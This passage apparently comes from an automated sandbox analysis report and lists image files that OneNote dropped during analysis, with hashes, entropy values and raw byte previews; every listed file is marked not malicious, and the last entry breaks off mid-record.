Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{151CC436-7325-471D-A165-2D714F009D47}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{15C45397-E64A-4687-9812-65C9EB1A5636}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Temp\{160CED52-115A-44FA-90F0-55CCB3872D51}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{177BC19C-64B2-414D-A31A-63A16DC22C0D}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Temp\{17B1DE9C-1341-4DAD-9593-6887268BA76B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Temp\{19005016-3685-463E-B5E7-0F5C325563BD}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Temp\{1B5BBC40-9BC1-479B-812A-D69F726D77DD}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{1BB81B1A-4B4B-49A3-B63B-F62C2DD2D61C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Temp\{1DE2CA4F-AC8B-4D91-8ACB-34229E29C3BC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{207C544E-A4E6-44CC-B5E8-00E1369AA151}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{207CB4D5-7327-4985-8F1B-09EA1BA1D71E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{20BC231D-8D89-4837-8C6C-C3625946D33B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{22CE6CE3-76DE-4CB0-9463-1F9206E54F2E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{2390D2BE-A08A-449A-910B-3D7EFCA4EAE2}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Temp\{23BC901A-7328-41EA-A5C9-15380647477B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
